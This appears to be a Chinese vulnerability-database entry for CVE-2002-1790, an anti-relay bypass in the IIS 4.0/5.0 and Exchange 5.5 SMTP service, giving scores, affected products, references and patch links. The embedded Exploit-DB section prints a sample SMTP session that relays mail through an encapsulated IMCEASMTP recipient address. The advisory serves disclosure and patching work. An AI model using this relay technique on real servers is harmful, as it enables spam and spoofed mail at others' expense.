CVE-2002-1790
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:31
NMCOE    

[原文]The SMTP service in Microsoft Internet Information Services (IIS) 4.0 and 5.0 allows remote attackers to bypass anti-relaying rules and send spam or spoofed messages via encapsulated SMTP addresses, a similar vulnerability to CVE-1999-0682.


[CNNVD]Microsoft IIS SMTP服务封装SMTP地址漏洞(CNNVD-200212-620)

        
        Microsoft IIS SMTP是一款用于发送邮件的SMTP服务器。
        Microsoft IIS SMTP存在封装SMTP地址漏洞,远程攻击者可以利用这个漏洞绕过RELAY规则,发送邮件。
        IIS 4和5包含的SMTP服务存在与Microsoft Security Bulletin MS99-027 相同的漏洞,攻击者可以使用封装SMTP地址来发送邮件到任意用户,利用这个漏洞,攻击者可以绕过SMTP服务中配置的RELAY规则,执行滥用邮件资源和发送匿名邮件等操作。
        Microsoft Security Bulletin MS99-027描述的漏洞当时只针对Microsoft Exchange Server 5.5,现在发现IIS 4和5包含的SMTP服务也同样存在此漏洞。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:exchange_server:5.5:sp1Microsoft Exchange Server 5.5 Service Pack 1
cpe:/a:microsoft:exchange_server:5.5:sp2Microsoft Exchange Server 5.5 Service Pack 2
cpe:/a:microsoft:exchange_server:5.5Microsoft exchange_srv 5.5
cpe:/a:microsoft:internet_information_server:4.0Microsoft IIS 4.0
cpe:/a:microsoft:internet_information_server:5.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1790
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1790
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-620
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5213
(PATCH)  BID  5213
http://www.iss.net/security_center/static/9580.php
(UNKNOWN)  XF  iis-smtp-mail-relay(9580)

- 漏洞信息

Microsoft IIS SMTP服务封装SMTP地址漏洞
中危 输入验证
2002-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft IIS SMTP是一款用于发送邮件的SMTP服务器。
        Microsoft IIS SMTP存在封装SMTP地址漏洞,远程攻击者可以利用这个漏洞绕过RELAY规则,发送邮件。
        IIS 4和5包含的SMTP服务存在与Microsoft Security Bulletin MS99-027 相同的漏洞,攻击者可以使用封装SMTP地址来发送邮件到任意用户,利用这个漏洞,攻击者可以绕过SMTP服务中配置的RELAY规则,执行滥用邮件资源和发送匿名邮件等操作。
        Microsoft Security Bulletin MS99-027描述的漏洞当时只针对Microsoft Exchange Server 5.5,现在发现IIS 4和5包含的SMTP服务也同样存在此漏洞。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        Microsoft
        ---------
        微软当时提供的补丁只针对Microsoft Exchange Server 5.5,还没有针对IIS 4和5包含的SMTP服务提供补丁程序。
        针对Microsoft Exchange Server 5.5服务的补丁如下,注意先安装service pack然后安装补丁程序:
        Microsoft IIS 4.0:
        Microsoft IIS 5.0:
        Microsoft Exchange Server 5.5 SP2:
        Microsoft Patch psp2imca.zip
        ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng/Exchg5.5/PostSP2/imc-fix/psp2imca.zip
        Microsoft Patch psp2imci.zip
        ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng/Exchg5.5/PostSP2/imc-fix/psp2imci.zip

- 漏洞信息 (21613)

Microsoft IIS 4/5 SMTP Service Encapsulated SMTP Address Vulnerability (EDBID:21613)
windows remote
2002-07-12 Verified
0 JWC
N/A [点击下载]
source: http://www.securityfocus.com/bid/5213/info

Microsoft Exchange 5.5 and the SMTP (Simple Mail Transfer Protocol) service included with IIS (Internet Information Services) 4.0 and 5.0 are vulnerable to an encapsulated SMTP address vulnerability.

The vulnerability was originally announced in Microsoft Security Bulletin MS99-027 and reported to affect Exchange Server 5.5. Microsoft released a patch to fix the vulnerability for Exchange Server 5.5 only. It has been recently reported that this vulnerability also affects the SMTP service included with Microsoft IIS 4.0 and 5.0. There exists no patch for the IIS SMTP service.

220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready
at
Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: test@test.com
250 2.1.0 test@test.com....Sender OK
RCPT TO: test2@test.com
550 5.7.1 Unable to relay for test@test.com
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable. 		

- 漏洞信息

27087
Microsoft IIS SMTP Encapsulated SMTP Address Open Relay

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-07-12 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站